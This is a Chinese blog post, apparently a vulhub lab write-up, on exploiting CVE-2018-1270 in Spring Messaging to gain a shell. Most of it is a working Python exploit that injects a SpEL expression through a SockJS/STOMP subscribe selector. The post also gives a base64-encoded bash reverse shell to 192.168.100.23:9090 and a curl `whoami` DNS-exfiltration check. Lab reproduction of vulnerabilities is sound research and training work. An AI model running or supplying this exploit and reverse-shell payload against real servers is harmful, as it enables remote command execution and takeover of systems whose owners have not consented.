【vulhub】Spring Messaging 远程命令执行漏洞(CVE-2018-1270)漏洞验证与getshell

最新推荐文章于 2023-12-27 14:51:23 发布
最新推荐文章于 2023-12-27 14:51:23 发布
阅读量736 收藏 2
点赞数 1
分类专栏: vulhub 文章标签: spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/119305502
版权

利用条件

影响范围

Spring Framework 5.0 to 5.0.4.
Spring Framework 4.3 to 4.3.14
已不支持的旧版本仍然受影响
详细过程请看
Spring Messaging 远程命令执行漏洞(CVE-2018-1270)

对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符)

bash -i >& /dev/tcp/192.168.100.23/9090 0>&1

进行base64编码
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}.

楼主这里就直接放EXP

#!/usr/bin/env python3
import requests
import random
import string
import time
import threading
import logging
import sys
import json

logging.basicConfig(stream=sys.stdout, level=logging.INFO)

def random_str(length):
    letters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(letters) for c in range(length))


class SockJS(threading.Thread):
    def __init__(self, url, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.base = f'{url}/{random.randint(0, 1000)}/{random_str(8)}'
        self.daemon = True
        self.session = requests.session()
        self.session.headers = {
            'Referer': url,
            'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
        }
        self.t = int(time.time()*1000)

    def run(self):
        url = f'{self.base}/htmlfile?c=_jp.vulhub'
        response = self.session.get(url, stream=True)
        for line in response.iter_lines():
            time.sleep(0.5)
    
    def send(self, command, headers, body=''):
        data = [command.upper(), '\n']

        data.append('\n'.join([f'{k}:{v}' for k, v in headers.items()]))
        
        data.append('\n\n')
        data.append(body)
        data.append('\x00')
        data = json.dumps([''.join(data)])

        response = self.session.post(f'{self.base}/xhr_send?t={self.t}', data=data)
        if response.status_code != 204:
            logging.info(f"send '{command}' data error.")
        else:
            logging.info(f"send '{command}' data success.")

    def __del__(self):
        self.session.close()


sockjs = SockJS('http://192.168.100.23:8080/gs-guide-websocket')
sockjs.start()
time.sleep(1)

sockjs.send('connect', {
    'accept-version': '1.1,1.0',
    'heart-beat': '10000,10000'
})
sockjs.send('subscribe', {
    'selector': "T(java.lang.Runtime).getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy85MDkwIDA+JjE=}|{base64,-d}|{bash,-i}')",
    'id': 'sub-0',
    'destination': '/topic/greetings'
})

data = json.dumps({'name': 'vulhub'})
sockjs.send('send', {
    'content-length': len(data),
    'destination': '/app/hello'
}, data)

先监听9090端口
在这里插入图片描述

执行exp
python3 exp.py
成功反弹shell。
在这里插入图片描述

还可以用dns验证一下。

还是去dnslog去获取一个dns地址
在这里插入图片描述

然后拼接命令

curl `whoami`.n8fwlg.dnslog.cn

对反弹shell的POC进行base64编码(java反弹shell都需要先编码,不然不会成功,原因貌似是runtime不支持管道符)
进行base64编码
bash -c {echo,Y3VybCBgd2hvYW1pYC5vaGp5ajEuZG5zbG9nLmNuCg==}|{base64,-d}|{bash,-i}
然后替换相应的payload就可以了
执行
python3 exp.py
成功执行
在这里插入图片描述

樱浅沐冰
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绿盟 SAS堡垒机 Exec 远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-05 73
绿盟 SAS堡垒机 Exec 远程命令执行漏洞(含批量验证poc)
[JAVA安全]Spring MessagingCVE-2018-1270
snowlyzz的博客
02-19 866
SpEL注入漏洞
SpringBoot-Eureka-xstream-rce漏洞复现
tpaer的博客
11-25 8108
关于SpringBoot-Eureka-xstream-rce漏洞复现的一次实战。
vulhubSpring Data Rest 远程命令执行漏洞CVE-2017-8046)漏洞复现验证和getshell
qq_45300786的博客
08-01 825
漏洞详情 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),path的值被传入setValue,导致执行了SpEL表达式,触发远程命令执行漏洞。 参考链接: http://xxlegend.com/2017/09/29/Spring%20Data%20Rest服务器PATCH请求远程代码执行漏洞CVE-2017-8046补充分析/ https://tech.meituan.
漏洞复现 - - - Springboot未授权访问
weixin_67503304的博客
09-05 2万+
讲解了 Springboot未授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
app渗透实战案例—Spring Boot Actuator未授权到脱库
good good study
12-09 7205
目录 前言 测试过程 查找敏感信息 Heapdump获取密码信息 前言 今天在做app渗透测试的时候,发现网站使用了Spring Boot框架。其存在一个未授权访问漏洞,通过寻找敏感字段获取了数据库地址和用户名,以及寻找密码获取了数据库连接密码直接拿下了数据库 测试过程 对app抓包,请求了一些服务器地址,我们将地址复制出来在浏览器访问 其中一个地址访问出现如下所示的页面,那么可以判断其使用了Spring Boot框架,Spring Boot框架是最流行的基于Java的微服务框架之一,
spring-messaging-5.0.8.RELEASE-API文档-中文版.zip
06-26
赠送jar包:spring-messaging-5.0.8.RELEASE.jar; 赠送原API文档:spring-messaging-5.0.8.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-5.0.8.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-...
spring-messaging-4.3.20.RELEASE-API文档-中英对照版.zip
04-07
赠送jar包:spring-messaging-4.3.20.RELEASE.jar 赠送原API文档:spring-messaging-4.3.20.RELEASE-javadoc.jar 赠送源代码:spring-messaging-4.3.20.RELEASE-sources.jar 包含翻译后的API文档:spring-...
spring-messaging-4.3.20.RELEASE-API文档-中文版.zip
04-08
赠送jar包:spring-messaging-4.3.20.RELEASE.jar; 赠送原API文档:spring-messaging-4.3.20.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-4.3.20.RELEASE-sources.jar; 包含翻译后的API文档:spring-...
spring-framework-5.0.5.RELEASE 漏洞修复
04-11
spring-messaging模块远程代码执行CVE-2018-1270) STOMP(Simple Text Orientated Messaging Protocol)全称为简单文本定向消息协议,它允许STOMP客户端与任意STOMP消息代理(Broker)进行交互。Spring框架中的...
spring-messaging-4.3.12.RELEASE-API文档-中英对照版.zip
07-11
赠送jar包:spring-messaging-4.3.12.RELEASE.jar; 赠送原API文档:spring-messaging-4.3.12.RELEASE-javadoc.jar; 赠送源代码:spring-messaging-4.3.12.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5753
CVE-2018-1270-Spring Messaging RCE漏洞复现
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
vulhub-Spring Messaging 远程命令执行漏洞CVE-2018-1270
weixin_42513429的博客
08-20 454
https://vulhub.org/#/environments/spring/CVE-2018-1270/ 根据官方的说法,应用的场景各不相同,官方的exp代码还是很容易看懂的 1、基础地址,在vulhub中为http://your-ip:8080/gs-guide-websocket 2、待执行的SpEL表达式,如T(java.lang.Runtime).getRuntime().exec('touch /tmp/success') 3、某一个订阅的地址,如vulhub中为:/topic/gree.
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
mole_exp的博客
02-26 8146
Spring Messaging 远程代码执行漏洞分析(CVE-2018-1270
Spring Messaging 远程命令执行漏洞CVE-2018-1270)——漏洞复现
weixin_42090431的博客
11-28 209
2. 用[sockjs协议](https://github.com/sockjs/sockjs-client)发送文本流,sockjs会选择一个合适的通道:websocket或xhr(http),与后端通信。在vulhub中,我们向`/app/hello`发送一个包含name的json,即可触发这个事件。2. 待执行的SpEL表达式,如`T(java.lang.Runtime).getRuntime().exec('touch /tmp/success')`根据你自己的需求修改POC。
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 776
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
Spring Messaging远程命令执行漏洞复现(CVE-2018-1270
wutiangui的博客
09-10 429
Spring MessagingSpring框架提供消息支持,用户使用受影响版本的Spring Framework时,允许应用程序通过Spring Messaging模块内存中STOMP代理创建WebSocket。由于selector用SpEL表达式编写,并使用StandardEvaluationContext解析(权限太大),进而导致远程执行代码攻击。访问:http://192.168.25.128:8080/gs-guide-websocket。1.准备shell命令
Spring-Messaging远程代码执行漏洞CVE-2018-1270
最新发布
m0_65150886的博客
12-27 1221
'selector': 'T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec 5/dev/tcp/你的kaliIP/kali监听端口;sockjs = SockJS('http://你的靶机IP:8080/gs-guide-websocket')
org.springframework:spring-messaging:5.3.18 依赖
05-20
这是 Spring Framework 5.3.18 中的一个 Maven 依赖项,它提供了对 Spring Messaging 模块的支持。Spring Messaging 提供了基于消息的应用程序的支持,包括支持 STOMP(简单文本定向消息协议)和 WebSocket。它还...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值